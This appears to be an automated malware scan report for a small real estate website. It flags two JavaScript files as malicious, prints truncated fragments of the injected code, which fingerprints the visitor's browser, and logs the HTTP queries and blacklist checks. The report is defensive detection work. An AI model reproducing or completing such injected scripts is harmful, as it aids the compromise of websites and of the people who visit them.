Scanned pages/files
Request | Server response | Status |
http://heymannrealestate.com/ | 200 OK Content-Length: 7512 Content-Type: text/html | clean |
http://heymannrealestate.com/media/system/js/mootools-core.js | 200 OK Content-Length: 99293 Content-Type: application/javascript | clean |
http://heymannrealestate.com/media/system/js/core.js | 200 OK Content-Length: 7204 Content-Type: application/javascript | clean |
http://heymannrealestate.com/media/system/js/caption.js | 200 OK Content-Length: 3138 Content-Type: application/javascript | clean |
http://heymannrealestate.com/media/system/js/mootools-more.js | 200 OK Content-Length: 2321 Content-Type: application/javascript | clean |
http://heymannrealestate.com/index.php?option=com_content&view=article&id=1&Itemid=301 | 200 OK Content-Length: 7512 Content-Type: text/html | clean |
http://heymannrealestate.com/index.php?option=com_properties&view=properties&Itemid=2 | 200 OK Content-Length: 18105 Content-Type: text/html | clean |
http://heymannrealestate.com/index.php?option=com_properties&view=property&id=18&Itemid=2 | 200 OK Content-Length: 11591 Content-Type: text/html | clean |
http://heymannrealestate.com/media/system/js/modal.js | 200 OK Content-Length: 12161 Content-Type: application/javascript | clean |
http://heymannrealestate.com/components/com_properties/includes/js/jquery.js | 200 OK Content-Length: 58210 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS', Antivirus reports:
| ||
http://heymannrealestate.com/components/com_properties/includes/prettyPhoto_30/js/jquery.prettyPhoto.js | 200 OK Content-Length: 30536 Content-Type: application/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24546 Content-Type: text/javascript | clean |
http://heymannrealestate.com/index.php?option=com_content&view=article&id=3&Itemid=3 | 200 OK Content-Length: 8428 Content-Type: text/html | clean |
http://heymannrealestate.com/index.php?option=com_contact&view=contact&id=1&Itemid=313 | 200 OK Content-Length: 11244 Content-Type: text/html | clean |
http://heymannrealestate.com/media/system/js/validate.js | 200 OK Content-Length: 5337 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS', window.addEvent("domready",function(){document.formvalidator=new JFormValidator}); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: heymannrealestate.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 13 May 2014 22:57:08 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.5
Content-Length: 7512
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 72911ee8cad822a1108f8e1fea9c4f38=o54o3j8k9dlch1q1ep7688qkp2; path=/
X-Powered-By: ASP.NET
...7512 bytes of data.
GET / HTTP/1.1
Host: heymannrealestate.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Tue, 13 May 2014 22:57:08 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.5
Content-Length: 7512
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 72911ee8cad822a1108f8e1fea9c4f38=o54o3j8k9dlch1q1ep7688qkp2; path=/
X-Powered-By: ASP.NET
...7512 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: heymannrealestate.com
Referer: http://www.google.com/search?q=heymannrealestate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: heymannrealestate.com
Referer: http://www.google.com/search?q=heymannrealestate.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=heymannrealestate.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://heymannrealestate.com/
Result: heymannrealestate.com is not infected or malware details are not published yet.
Result: heymannrealestate.com is not infected or malware details are not published yet.